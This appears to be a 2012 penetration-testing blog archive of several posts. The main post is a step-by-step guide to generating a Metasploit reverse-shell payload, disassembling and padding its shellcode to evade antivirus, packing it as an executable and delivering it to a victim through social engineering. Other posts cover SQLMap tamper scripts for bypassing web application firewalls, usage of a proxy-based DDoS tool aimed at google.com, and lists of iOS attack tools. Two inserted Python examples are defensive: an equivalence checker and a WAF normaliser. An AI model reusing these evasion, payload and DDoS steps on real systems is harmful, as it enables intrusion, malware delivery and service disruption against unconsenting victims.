Feb 18, 2012

Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)

If you want all the details, please go to the source.

1. Create the malicious file (backdoor). Either of the following produces the raw payload:
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R > raw_binary
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > raw_binary

2. Copy metasm.rb and the metasm directory (the Ruby disassembly library that ships with Metasploit) into your system Ruby library directory so the sample scripts can load it.
$ cd /pentest/exploits/framework/lib/metasm
$ cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3. Disassemble it with the sample script that comes with Metasm.
$ ruby /pentest/exploits/framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

That creates a file called asm_code.asm, which should look something like this:

cld ; @0 fc
call sub_8fh ; @1 e889000000 x:sub_8fh
pushad ; @6 60
mov ebp, esp ; @7 89e5
xor edx, edx ; @9 31d2
mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h
mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown
mov edx, [edx+14h] ; @12h 8b5214 r4:unknown
// Xrefs: 8dh
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff
// Xrefs: 2ch
xor eax, eax ; @1eh 31c0
lodsb ; @20h ac
cmp al, 61h ; @21h 3c61
jl loc_27h ; @23h 7c02 x:loc_27h
sub al, 20h ; @25h 2c20
// Xrefs: 23h
ror edi, 0dh ; @27h c1cf0d
add edi, eax ; @2ah 01c7
loop loc_1eh ; @2ch e2f0 x:loc_1eh
push edx ; @2eh 52
push edi ; @2fh 57
mov edx, [edx+10h] ; @30h 8b5210 r4:unknown
mov eax, [edx+3ch] ; @33h 8b423c
add eax, edx ; @36h 01d0
mov eax, [eax+78h] ; @38h 8b4078
test eax, eax ; @3bh 85c0
jz loc_89h ; @3dh 744a x:loc_89h
add eax, edx ; @3fh 01d0
push eax ; @41h 50
mov ecx, [eax+18h] ; @42h 8b4818
mov ebx, [eax+20h] ; @45h 8b5820
add ebx, edx ; @48h 01d3
// Xrefs: 66h
jecxz loc_88h ; @4ah e33c x:loc_88h
dec ecx ; @4ch 49
mov esi, [ebx+4*ecx] ; @4dh 8b348b
add esi, edx ; @50h 01d6
xor edi, edi ; @52h 31ff
// Xrefs: 5eh
xor eax, eax ; @54h 31c0
lodsb ; @56h ac
ror edi, 0dh ; @57h c1cf0d
add edi, eax ; @5ah 01c7
cmp al, ah ; @5ch 38e0
jnz loc_54h ; @5eh 75f4 x:loc_54h
add edi, [ebp-8] ; @60h 037df8
cmp edi, [ebp+24h] ; @63h 3b7d24
jnz loc_4ah ; @66h 75e2 x:loc_4ah
pop eax ; @68h 58
mov ebx, [eax+24h] ; @69h 8b5824
add ebx, edx ; @6ch 01d3
mov cx, [ebx+2*ecx] ; @6eh 668b0c4b
mov ebx, [eax+1ch] ; @72h 8b581c
add ebx, edx ; @75h 01d3
mov eax, [ebx+4*ecx] ; @77h 8b048b
add eax, edx ; @7ah 01d0
mov [esp+24h], eax ; @7ch 89442424
pop ebx ; @80h 5b
pop ebx ; @81h 5b
popad ; @82h 61
pop ecx ; @83h 59
pop edx ; @84h 5a
push ecx ; @85h 51
jmp eax ; @86h ffe0
// Xrefs: 4ah
pop eax ; @88h 58
// Xrefs: 3dh
pop edi ; @89h 5f
pop edx ; @8ah 5a
mov edx, [edx] ; @8bh 8b12 r4:unknown
jmp loc_15h ; @8dh eb86 x:loc_15h
// Xrefs: 1
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
pop ebp ; @8fh 5d
push 3233h ; @90h 6833320000
push 5f327377h ; @95h 687773325f
push esp ; @9ah 54
push 726774ch ; @9bh 684c772607
call ebp ; @0a0h ffd5 endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h ; @120h

4. Now obfuscate it. Quoted from the source:
For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off will sometimes do the trick. Also, just before an XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, or move the values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So, using the above example, we can change the section beginning with ‘// Xrefs: 8dh’

From This:
// Xrefs: 8dh
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff

To This:
// Xrefs: 8dh
mov esi, [edx+28h]                ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h]        ; @18h 0fb74a26 r2:unknown
mov edi, ecx                ; Move the contents of the ECX register into the EDI Register
push edi                    ; Push the EDI register onto the current stack frame
pop edi                    ; Pop it back off
mov edi, ecx                ; Mov ECX back into edi
xor ecx, ecx                ; Zero out the contents of the ECX register
mov ecx, edi                ; Mov EDI back into ECX
xor edi, edi                ; @1ch 31ff
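The point of the rewrite above is that the inserted instructions change the bytes a signature would match without changing what the code does. The following is an added example (my code, not from the pentestgeek post or from Metasm) that makes this concrete from the analyst's side: a tiny symbolic evaluator over the register and stack subset used in the fragment. Fed the "From This" and "To This" listings it reports that both leave every register in the same state, while a constructed variant that forgets to restore ECX (labelled BROKEN below) is flagged as a real behaviour change. This is the kind of semantic normalisation that byte-signature scanning lacks and that emulation or behavioural detection supplies.

```python
"""Added example, not code from the pentestgeek post or from Metasm: a small
symbolic evaluator for the x86 register/stack subset the ghost-writing fragment
uses.  Fed the 'From This' and 'To This' listings, it shows that the padded
version leaves every register in the same state as the original, i.e. only the
bytes a signature would match have changed, not the behaviour."""

# ORIGINAL and GHOSTWRITTEN are copied from the listings above; BROKEN is a
# constructed variant that forgets to restore ECX, the kind of slip that breaks
# the payload.
ORIGINAL = """\
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff
"""

GHOSTWRITTEN = """\
mov esi, [edx+28h]                ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h]     ; @18h 0fb74a26 r2:unknown
mov edi, ecx                      ; junk: copy ECX into EDI
push edi                          ; junk: push EDI ...
pop edi                           ; junk: ... and pop it straight back
mov edi, ecx                      ; junk: copy ECX again
xor ecx, ecx                      ; junk: clear ECX
mov ecx, edi                      ; junk: restore ECX from EDI
xor edi, edi                      ; @1ch 31ff
"""

BROKEN = GHOSTWRITTEN.replace("mov ecx, edi", "nop")

REGS = ("eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp")


def parse_listing(text):
    """Yield (mnemonic, operands) per line; '; ...' trailers and '// ...' lines are dropped."""
    for line in text.splitlines():
        code = line.split(";", 1)[0].strip()
        if not code or code.startswith("//"):
            continue
        mnem, _, rest = code.partition(" ")
        ops = [o.strip() for o in rest.split(",")] if rest else []
        yield mnem.lower(), ops


def operand(state, op):
    """Symbolic value of an operand: register contents, an opaque memory load, or an immediate."""
    if op in state:
        return state[op]
    if op.startswith("["):
        return "load(%s)" % op
    return op


def evaluate(text):
    """Symbolically execute a fragment.  Every register starts as its own name;
    returns (register state, stack contents) so two fragments can be compared."""
    state = {r: r for r in REGS}
    stack = []
    for mnem, ops in parse_listing(text):
        if mnem in ("mov", "movzx"):
            dst, src = ops
            if src.startswith("word ptr "):
                src = src[len("word ptr "):]
            val = operand(state, src)
            state[dst] = "zext(%s)" % val if mnem == "movzx" else val
        elif mnem == "push":
            stack.append(operand(state, ops[0]))
        elif mnem == "pop":
            if not stack:
                raise ValueError("pop with empty stack: unbalanced push/pop")
            state[ops[0]] = stack.pop()
        elif mnem == "xor":
            dst, src = ops
            # xor r, r is the idiom for zeroing a register
            state[dst] = "0" if dst == src else "xor(%s, %s)" % (state[dst], operand(state, src))
        elif mnem in ("add", "sub"):
            dst, src = ops
            state[dst] = "%s(%s, %s)" % (mnem, state[dst], operand(state, src))
        elif mnem in ("inc", "dec"):
            state[ops[0]] = "%s(%s)" % (mnem, state[ops[0]])
        elif mnem == "nop":
            pass
        else:
            raise ValueError("unsupported mnemonic: " + mnem)
    return state, stack


def same_effect(a, b):
    """True when both fragments leave identical symbolic register state and stack."""
    return evaluate(a) == evaluate(b)


if __name__ == "__main__":
    print("ghost-written fragment equivalent to original:", same_effect(ORIGINAL, GHOSTWRITTEN))
    print("broken fragment equivalent to original:", same_effect(ORIGINAL, BROKEN))
```

The evaluator covers only the handful of mnemonics the fragment uses and treats memory operands as opaque loads, which is enough to show that the padding is dead weight to anything that reasons about effects rather than bytes.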

5. Add the following two lines to the top of the file for it to build correctly
.section '.text' rwx

6. Use Metasm to assemble the code and package it as a Windows PE executable.
$ /pentest/exploits/framework/lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe

7. Now verify the result with
$ file coolstuff.exe

8. Run it on the victim with your social engineering skills. Have a nice hack :).

Source: http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/

If you like my blog, Please Donate Me

Feb 17, 2012

Recommended Security Application For iOS

All the apps I recommend here require a jailbroken device.

Default Cydia repo

  • OpenSSH: connect to the iPhone remotely over SSH
  • Adv-cmds: a set of process commands such as ps, kill and finger
  • Sqlite3: SQLite database client
  • GNU Debugger: run-time analysis and reverse engineering
  • Syslogd: view iPhone logs
  • Veency: view the phone on the workstation with the Veency client
  • Tcpdump: capture network traffic on the phone
  • com.ericasadun.utilities: plutil, to view property list files
  • Grep: searching
  • Odcctools: otool, the object file display tool
  • Crackulous: decrypt iPhone apps
  • Hackulous: install decrypted apps
  • Protect My Privacy: protect personal information on your iPhone
  • Metasploit
  • SET (Social Engineering Tool)
  • Nikto2 (depends on Perl, which takes a lot of space on the root partition)
  • Stealth Mac
  • Inguma
  • Slowloris
  • Pentbox 1.4
  • Netcat
  • iPwn
  • Ettercap-ng
  • dsniff
  • danaus plexippus
  • iAHT
  • Nmap
Source: https://securitylearn.wordpress.com/2012/02/07/useful-cydia-apps-for-pentesting/

Bypassing Web Application Firewalls with SQLMap Tamper Scripts

The tamper scripts modify the request so that it evades the WAF (Web Application Firewall) rules. In some cases you need to chain a few tamper scripts together to get past the WAF. For a complete list of the tamper scripts, refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
The first scripts I’ll demonstrate are space2hash.py and space2morehash.py, which work with MySQL (I still haven't gotten around to the MSSQL one). These scripts convert every space into a comment containing random text. The extended version (space2morehash.py) also inserts the comments between certain function names and their parentheses.
To get started using the tamper scripts, you use the --tamper switch followed by the script name. In my example I'm using the following command:
./sqlmap.py -u -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
Figure 1: space2morehash.py tamper script in action

As shown in figure 1, the tamper script replaces the spaces in the injection with %23randomText%0A (URL encoded, of course). The functions CHAR(), USER() and CONCAT() become FUNCTION%23randomText%0A() because they are not blacklisted in IGNORE_SPACE_AFFECTED_KEYWORDS. This works because of MySQL's Function Name Parsing and Resolution rules, which govern how it treats function calls and identifiers.
Another two scripts that transform spaces are space2mssqlblank.py and space2mysqlblank.py. MySQL accepts the bytes 09, 0A-0D and A0 as whitespace, while MSSQL accepts a much wider range, 01-1F.
Figure 2: space2mssqlblank.py using different characters as whitespaces

Next up we have a few scripts that mess around with the encoding: charencode.py and chardoubleencode.py. These are useful to bypass different keyword filters, for example when table_name is being detected and there is no way around it.
Figure 3: charencode.py can be used to evade keyword detection

If the application URL decodes the request for some reason (some do), the chardoubleencode.py script can come in handy.
Figure 4: chardoubleencode.py can be used when the application decodes the request

Additionally, if the application is programmed in ASP/ASP.NET, the charunicodeencode.py and percentage.py scripts can be used to hide the true payload.
Figure 5: charunicodeencode.py obfuscating the injection with Unicode encoding

An interesting characteristic of ASP is that you can put as many percent signs as you like between characters. For example, AND 1=%%%%%%%%1 is completely valid!
Figure 6: Percent signs between each character are valid in ASP
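Everything the scripts above do is a transformation that the database or the web server undoes before the query runs, which is why a WAF that matches its rules against the raw request loses. The example below is added here and is not from the websec.ca post or from sqlmap: a normalisation layer that reverses those transformations before rule matching, run over constructed payloads shaped like the outputs the post describes. The stray-percent handling models the ASP behaviour the post states; the two rules and the sample values are illustrative assumptions.

```python
"""Added example, not from the websec.ca post or from sqlmap: a request
normaliser of the kind a WAF must run before matching its rules, covering the
transformations the tamper scripts above rely on (comment-for-space, alternative
whitespace bytes, single/double/%u percent-encoding and ASP's tolerance of stray
'%').  The sample payloads are constructed to mirror the post's descriptions."""

import re
from urllib.parse import unquote

# Whitespace bytes the two engines accept besides ' ' (from the post: MySQL
# 09, 0A-0D, A0; MSSQL 01-1F).
MYSQL_BLANKS = "\t\n\x0b\x0c\r\xa0"
MSSQL_BLANKS = "".join(chr(c) for c in range(0x01, 0x20))
BLANK_CLASS = re.compile("[%s]" % re.escape(MYSQL_BLANKS + MSSQL_BLANKS))

# Two illustrative rules (assumed, not from the post): UNION ... SELECT and
# references to table_name.
RULES = (
    re.compile(r"\bunion\b\s+\bselect\b", re.IGNORECASE),
    re.compile(r"\btable_name\b", re.IGNORECASE),
)


def url_decode_fully(s, max_rounds=3):
    """Undo %XX and IIS-style %uXXXX encoding until the text stops changing
    (bounded), which reduces chardoubleencode output to plain text."""
    for _ in range(max_rounds):
        decoded = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        decoded = unquote(decoded, encoding="latin-1")  # one char per %XX, keeps \xa0
        if decoded == s:
            break
        s = decoded
    return s


def strip_stray_percent(s):
    """Model of the ASP behaviour the post describes: a '%' not followed by two
    hex digits is dropped, so '1=%%%%1' reads as '1=1' and '%S%E%L' as 'SEL'."""
    return re.sub(r"%(?![0-9a-fA-F]{2})", "", s)


def normalize(raw):
    """Canonical form of a parameter value for rule matching."""
    s = url_decode_fully(raw)
    s = strip_stray_percent(s)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # inline /* */ comments
    s = re.sub(r"#[^\n]*(?:\n|$)", " ", s)          # MySQL '#' comments (space2hash output)
    s = BLANK_CLASS.sub(" ", s)                     # alternative whitespace bytes
    return re.sub(r" +", " ", s).strip()


def matches_rules(s):
    return any(rule.search(s) for rule in RULES)


def inspect(raw):
    """(blocked on the raw string, blocked after normalisation, normalised text)."""
    norm = normalize(raw)
    return matches_rules(raw), matches_rules(norm), norm


# Constructed payloads shaped like the output of the tamper scripts discussed above.
SAMPLES = {
    "space2hash":        "1%23aBcD%0AUNION%23xYz%0ASELECT%23q%0A1",
    "space2mysqlblank":  "1%A0UNION%0CSELECT%091",
    "space2mssqlblank":  "1%01UNION%1FSELECT%021",
    "charencode":        "1%20AND%20%74%61%62%6C%65%5F%6E%61%6D%65%3D%27users%27",
    "chardoubleencode":  "1%2520AND%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565",
    "charunicodeencode": "1%u0020AND%u0020%u0074%u0061%u0062%u006C%u0065%u005F%u006E%u0061%u006D%u0065",
    "percentage":        "1 AND 1=%%%%%%%%1 AND %t%a%b%l%e%_%n%a%m%e=1",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        raw_hit, norm_hit, norm = inspect(raw)
        print("%-18s raw=%-5s normalised=%-5s %r" % (name, raw_hit, norm_hit, norm))
```

Every sample slips past the rules on the raw string and is caught after normalisation. The decode loop is bounded on purpose: an unbounded "decode until stable" is itself a resource-exhaustion target, and a real deployment should also decide per backend which whitespace and comment dialects to fold rather than applying all of them at once.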
Source: http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

Feb 13, 2012

Barrelroll - Make Proxy Server to DDoS Clients

This program turns proxy servers into DDoS clients. Use only for educational and research purposes.

Requirements:
-> pycurl
-> python 2.3

Usage:
$ ./barrelroll.py [ip] [host] [forks]

Examples:
$ ./barrelroll.py google.com 30 < full_list/_full_list.txt
$ ./barrelroll.py google.com 30 < full_list/us.txt

Feb 12, 2012

Adding More Pentesting Tools for BackTrack 5

If you want the details and the list of tools, please go to the source.

1. Download the script
- svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit
2. Go into folder and change mode of script
- cd bt5-fixit
- chmod +x bt5-fixit.sh
3. Run it and check what you got.
- ./bt5-fixit.sh

Source: http://www.theprojectxblog.net/improving-and-adding-more-pentesting-tools-for-backtrack-5/